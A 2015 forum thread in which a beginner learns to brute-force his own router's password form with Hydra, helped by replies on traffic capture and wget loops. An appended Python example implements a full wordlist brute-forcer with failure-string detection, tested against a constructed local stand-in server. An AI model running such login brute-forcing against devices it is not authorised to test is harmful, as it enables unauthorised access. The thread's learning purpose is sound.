Rombro Posted September 19, 2015

Hi, I am very new to all this. I am trying to learn how to use Hydra. I've done some reading online and had a go at using it against my own router. I am using Burp Suite to get the POST and response info. My router login page does not have a field for a login, only for a password, the default password being "admin". On trying to log in to the router using an incorrect password I get the following output:

POST /login.cgi HTTP/1.1
Host: 10.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.1.1.1/login_main.html
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

login_option=0&password=asdf

and the response I get back is:

HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 19 Sep 2015 16:27:20 GMT
Content-Type: text/html
Connection: close

<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<script language="JavaScript">
function back_page() {
    var loc = 'login.html';
    var code = 'location="' + loc + '"';
    eval(code);
}
</script>
</head>
<body>
<script language="JavaScript">
alert("Invalid password");
back_page();
</script>
</body>
</html>

Given I am just trying to test out Hydra at the moment and learn it, I figured I'd give it the correct login credentials so it only has to make one attempt. My hydra command is as follows:

hydra -l 0 -p admin 10.1.1.1 http-post-form "/login_main.html:login_option=^USER^&password=^PASS^:Invalid password" -V

However I am getting no joy. It is not able to identify "admin" as the correct password. Any help would be greatly appreciated.
cooper Posted September 19, 2015

Wireshark. Log in using a browser. Follow TCP stream. See what's up.
i8igmac Posted September 19, 2015 (edited)

You will have more success scripting your own tool rather than depending on someone else's tools...

As cooper said, open up a packet capture tool and look at the client/server headers. If you can duplicate what you see on the wire with hydra, test with a single "-u admin -p password" until you see the proper results.

You can use curl or wget...

Edited September 19, 2015 by i8igmac
vailixi Posted September 19, 2015

I was never really sure about brute forcing web logins and what information I was actually looking for.
i8igmac Posted September 20, 2015 (edited)

If you send a proper request, you should see a response...

If you already have a scripting language of choice, you truly are better off. A tool like Hydra is developed for a broad range of protocols. Any plugins, modules or firewalls this server may have installed could potentially cause Hydra to miss...

You need to look at the traffic and investigate 2 scenarios:

What would a failed response look like?
What would a successful response look like?

What I have done in the past, through a scripting language: sort through your password list, processing each line with wget. You can then grep through the output files generated by wget.

This is a fun subject. I encourage you to spend the time and experiment on other services as well... You will come across firewall rules that make this subject much more exciting :-) Like a chess game with your eyes closed.

Edited September 20, 2015 by i8igmac
vailixi Posted September 20, 2015

So you will know what a false result looks like by intercepting the server response with Wireshark? So if you get a response other than a failed one, it might be a successful login? If it were something like a website where you could create an account, you would be able to successfully log in and collect the positive login response.

So something like (sorry for the shitty pseudocode here):

# Read the wordlist one candidate per line, hand each one to wget,
# and treat any response that lacks the known failure text as a hit.
while read -r line; do
    wget -q -O out.html --user=admin --password="$line" <url>
    if ! grep -q "<failure string>" out.html; then
        echo "admin $line"
        break
    fi
done < wordlist.txt

Am I close here?
Rombro Posted September 20, 2015 (Author)

So I've got the response for both a failed login and a successful login. The failed one is the response in the OP; the successful one is just the router control panel page.

And in the case of the hydra command I am feeding it the correct login information (or at least that is what I'm trying to do; not sure if I've got it right, that's the problem), so it should work, but it still does not identify the password as correct.

Given that the response for a fail is in the form of an alert box, how do I script something to parse through the text of an alert box? Or do I not need to do that? I'm a little confused.
Rombro Posted September 20, 2015 (Author)

Apologies for the double post, I couldn't find the edit button. Is there one?

Ignore the parsing alert box thing, I've figured it out. I have managed to build the wget command to log into the site and then compared the output for a successful and unsuccessful login manually. The command is:

wget --save-cookies cookies.txt --keep-session-cookies --auth-no-challenge --post-data 'login_option=0&password=nope' http://10.1.1.1/login.cgi

The login_option and login.cgi come from the Burp Suite output as in the OP. Now I just need to build a script to automate it - happy days! Thanks for the help so far guys.
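Added example (not part of the thread, and not anyone's posted code): the "post each candidate, grep the response for the failure text" loop that i8igmac describes, written against the form fields and action URL from the OP's Burp capture (login_option, password, /login.cgi) and the "Invalid password" string from the failed response. Since nothing here should touch a real router, the block also contains a constructed stand-in server that answers the form the way the capture shows; the wordlist is constructed too, and "admin" is only the correct password because the thread names it as the default. The calibrate step is the check the thread's advice implies: a known-bad password must produce the failure marker before the loop is trusted, otherwise a wrong URL or field name makes every guess look like a hit.

```python
"""Form-login brute force with fail-marker detection, plus a stand-in router."""
import http.server
import threading
import urllib.error
import urllib.parse
import urllib.request

# Constructed stand-in for the router in the thread. The server below answers
# the form the way the original post's Burp capture shows: the "Invalid
# password" alert page on a miss, and a minimal "control panel" page on a hit.
CORRECT_PASSWORD = "admin"          # router default named in the thread
LOGIN_PATH = "/login.cgi"            # action URL from the Burp capture
FAIL_MARKER = "Invalid password"     # text that only a failed login contains

FAIL_PAGE = (
    "<html><head><meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></head><body>"
    '<script language="JavaScript">alert("Invalid password");'
    'location="login.html";</script></body></html>'
)
OK_PAGE = "<html><body><h1>Router control panel</h1></body></html>"


class FakeRouter(http.server.BaseHTTPRequestHandler):
    """Minimal emulation of the router's login handler (constructed)."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        if self.path != LOGIN_PATH:
            self._reply(404, "<html><body>404 Not Found</body></html>")
            return
        password = fields.get("password", [""])[0]
        self._reply(200, OK_PAGE if password == CORRECT_PASSWORD else FAIL_PAGE)

    def _reply(self, status, html):
        body = html.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_fake_router():
    """Start the stand-in on a random loopback port and return the server."""
    server = http.server.HTTPServer(("127.0.0.1", 0), FakeRouter)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def try_password(base_url, password, login_path=LOGIN_PATH):
    """POST one guess exactly as the browser did and return the response body."""
    data = urllib.parse.urlencode({"login_option": "0", "password": password}).encode()
    req = urllib.request.Request(
        base_url + login_path, data=data,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode(errors="replace")


def calibrate(base_url, login_path=LOGIN_PATH, fail_marker=FAIL_MARKER):
    """Send a known-bad password and confirm the failure marker appears.

    If it does not, the URL or the field names are wrong, and a marker-based
    loop would report every guess as a success.
    """
    try:
        body = try_password(base_url, "definitely-not-the-password", login_path)
    except urllib.error.HTTPError:
        return False
    return fail_marker in body


def brute_force(base_url, wordlist, login_path=LOGIN_PATH, fail_marker=FAIL_MARKER):
    """Return the first candidate whose response lacks the failure marker."""
    if not calibrate(base_url, login_path, fail_marker):
        raise RuntimeError("known-bad login did not produce the failure marker; "
                           "check the form URL and field names before looping")
    for candidate in wordlist:
        if fail_marker not in try_password(base_url, candidate, login_path):
            return candidate
    return None


def run_against_fake_router(wordlist, login_path=LOGIN_PATH):
    """Spin up the stand-in, run the loop against it, tear it down."""
    router = start_fake_router()
    url = "http://127.0.0.1:%d" % router.server_address[1]
    try:
        return brute_force(url, wordlist, login_path)
    finally:
        router.shutdown()
        router.server_close()


def form_check_passes(login_path):
    """True if a known-bad login against the stand-in yields the failure marker."""
    router = start_fake_router()
    url = "http://127.0.0.1:%d" % router.server_address[1]
    try:
        return calibrate(url, login_path)
    finally:
        router.shutdown()
        router.server_close()


if __name__ == "__main__":
    # Constructed wordlist; the router default sits in the middle of it.
    print(run_against_fake_router(["password", "1234", "admin", "letmein"]))
```

Against a real device, replace the stand-in with the router's address and keep the calibration step: posting to /login_main.html (the page the OP's hydra command targets) instead of /login.cgi (the action in the capture) never produces the "Invalid password" text, and the check fails loudly instead of letting a failure-string loop declare the first guess a hit.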
cooper Posted September 20, 2015

You get the edit button after a certain amount of posts to the forum. It's anti-spam. Glad to see you got it working.
0o0michael0o0 Posted September 20, 2015 (edited)

Use Burp Suite and check the post data. Who knows, maybe you can inject the post data.

Edited September 20, 2015 by 0o0michael0o0
i8igmac Posted September 20, 2015

I should make a tutorial on traffic watching and how to reproduce the stream with tools like curl, wget, netcat and ruby...

apt-get install tcpick

This is a tool I use daily. It's a lot like tcpdump, a console-based traffic sniffer. With 2 consoles run these 2 commands:

tcpick -i wlan0 -bPS -C
tcpick -i wlan0 -bPC -C

Now with your web browser, log into the web page. You will see the traffic in both consoles. One console will show your client request; the other console will show your server response.

You can then press ctrl-c in both consoles to kill the application and copy the data you see into a text editor.

You can now start both consoles back up, then run your hydra, wget, curl tests. Watch the traffic and identify when you have a proper authentication.